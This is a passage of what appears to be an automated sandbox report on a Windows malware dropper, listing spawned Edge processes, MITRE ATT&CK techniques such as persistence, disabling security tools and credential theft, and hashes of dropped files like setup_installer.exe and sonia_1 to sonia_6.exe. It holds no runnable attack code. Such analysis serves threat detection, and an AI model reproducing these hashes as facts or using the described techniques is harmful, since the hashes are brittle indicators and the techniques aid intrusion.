                                                                                                                                                                                    PID:996
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:5444
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:1744

                                                                                                                                                                                  Network

                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                  Persistence

                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1031

                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                  1
                                                                                                                                                                                  T1060

                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                  4
                                                                                                                                                                                  T1112

                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                  1
                                                                                                                                                                                  T1089

                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                  1
                                                                                                                                                                                  T1497

                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                  1
                                                                                                                                                                                  T1130

                                                                                                                                                                                  Credential Access

                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                  4
                                                                                                                                                                                  T1081

                                                                                                                                                                                  Discovery

                                                                                                                                                                                  Software Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1518

                                                                                                                                                                                  Query Registry

                                                                                                                                                                                  7
                                                                                                                                                                                  T1012

                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                  1
                                                                                                                                                                                  T1497

                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                  7
                                                                                                                                                                                  T1082

                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                  2
                                                                                                                                                                                  T1120

                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1018

                                                                                                                                                                                  Collection

                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                  4
                                                                                                                                                                                  T1005

                                                                                                                                                                                  Command and Control

                                                                                                                                                                                  Web Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1102

                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                  Downloads

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7f10f9e8ae3e736e6b3f839a4eb42f24

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    6b5991b57dad3a7633ae6879e1e3e5c11ae38d87

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    75bf444bb06c3eb5dad2444f9b0dbdea7ec8fd5542337cabe9088d12df3b60c6

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    e647ba9ed7abb21fad66dbe5c5353b980d8359d2850fe39435a0defd85c5226f6fba52d00600f4d4d2d55041b864d436e6307cf248e4881b78a31961b9302c9f

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                    MD5

                                                                                                                                                                                    f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                    MD5

                                                                                                                                                                                    2a5f42ab890cb92e44a99b519c8d4e0e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    665769378baf2b9a333ec703a2f7787340eb47c0

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    b1cd725d452d71ef8b012908748673bdcadac25805975738d6a65884ab70b7f5

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    e93550732ae80ebde7303072212e285050ed37344f0813b065912518d1fc3c29cc88bf56d586c40f108ab98e0d717d08cc3906c25f3acf799745206aacc8ee20

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7537c1629c50917c3609ec9cbd844b91

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    df25f1cc3a8c596576031c79320f3f1cce4a6bb4

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    27fbceac8bcd54d0b3ed24bce4f7b7405875d4e5c01fa8b53cb873cb4aeae0b2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    e315934124ee53cbe881a4588aedd82d05690be37b5398384c194bad962f0dc40056b65d5341d46a5ec6c7eacacb90d4ff76efebb599b45efdf07c3799cb86e1

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                    MD5

                                                                                                                                                                                    caee624e3067ea226663ba95ec6f5f1d

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    13c910242f7752d539833f91a7330c97b260da36

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    bc75c3dfdf656645a3779b50309a2a1477de5bab1af52314a52b1f6b1035519c

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    57a04156b4abb0a068d59ec239c261386475d7ab83f58f59d5f7ea6107c36b3fbcf0c6ff620df8e389bf34e9b2b2bc6b9c5516ed835aa682dacdc86308b047bd

                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                    MD5

                                                                                                                                                                                    36a4765a83f8b7ca0d4d3cc76acad319

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    bf1e4f785433672c11b578b47743f1d7faf3546a

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    acea208008c5fb777ea7da9e3605e56b0a793bf1f304712c9916b8d7506705b9

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    bd0aa0382fb810510a54c54bf193302b9c2c894974751bad1adc0577e456c4b65b9c6aca206a327bbf8ac639e56321b6c9a14da47d0eda6637a3b2b8dac20a2b

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\libcurl.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\libcurlpp.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\libgcc_s_dw2-1.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\libstdc++-6.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\libwinpthread-1.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\setup_install.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\setup_install.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_1.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_2.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_2.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_3.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_3.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_4.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_4.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_5.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_5.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_6.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4DA08DE4\sonia_6.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    MD5

                                                                                                                                                                                    b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    74231678f536a19b3016840f56b845c7

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    74231678f536a19b3016840f56b845c7

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                  • C:\Users\Admin\Documents\5az3lRXD62qRiLHRL6YyeN4q.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    54ce8822fbf1cdb94c28d12ccd82f8f9

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    7077757f069fe0ebd338aeff700cab323e3ab235

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    0984c3c6a8ab0a4e8f4564ebcd54ab74ae2d22230afafe48b346485251f522e2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    183115142a2ae68259392fc03783f49df9312acdc49011ca367acaa82d68c209d25d50a0a917504572cc3b7467d7ce4ea6bf391fe6462d1f09ae743e8c0ea435

                                                                                                                                                                                  • C:\Users\Admin\Documents\5az3lRXD62qRiLHRL6YyeN4q.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    54ce8822fbf1cdb94c28d12ccd82f8f9

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    7077757f069fe0ebd338aeff700cab323e3ab235

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    0984c3c6a8ab0a4e8f4564ebcd54ab74ae2d22230afafe48b346485251f522e2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    183115142a2ae68259392fc03783f49df9312acdc49011ca367acaa82d68c209d25d50a0a917504572cc3b7467d7ce4ea6bf391fe6462d1f09ae743e8c0ea435

                                                                                                                                                                                  • C:\Users\Admin\Documents\8jtDbqap5uPajNfAax7C2gqu.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7eadd2a867a51a6c6c04d812eb38b5ef

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    2f0df8b35dfc9228465972d6279ffd41495743a0

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    ebdac5603410d0c7a633e42d40b7798efabde9f11cd4acf7205032b8b9306dd2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    0ccee2e1bb6e5bb83c0d79613eb1d1201ebbe6c2a3e949abfe4218dc0472afb9b04ae420440a58a736163fb4838145f9a68a9e5387e48357613c44fd52a780e0

                                                                                                                                                                                  • C:\Users\Admin\Documents\8jtDbqap5uPajNfAax7C2gqu.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7eadd2a867a51a6c6c04d812eb38b5ef

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    2f0df8b35dfc9228465972d6279ffd41495743a0

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    ebdac5603410d0c7a633e42d40b7798efabde9f11cd4acf7205032b8b9306dd2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    0ccee2e1bb6e5bb83c0d79613eb1d1201ebbe6c2a3e949abfe4218dc0472afb9b04ae420440a58a736163fb4838145f9a68a9e5387e48357613c44fd52a780e0

                                                                                                                                                                                  • C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    da3d8058c36f4b3b423deb03b4379414

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    03a817be59608078d08d9442fb16380735016818

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    8e4a5d38a79f1f13297db22e68805711767767e159e6f8eec469b842a38caea2

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    c292766420203cbfc25427444efe17baf6f424c2891a8413936c3ee968ea088bb7e97212f3e20039f2b647e6984deaa123c91a06dc19c8d08531e04c3c776668

                                                                                                                                                                                  • C:\Users\Admin\Documents\JFxEr6JPM7d2m_E2EMqvteby.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    da3d8058c36f4b3b423deb03b4379414

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    03a817be59608078d08d9442fb16380735016818

                                                                                                                                                                                    SHA256

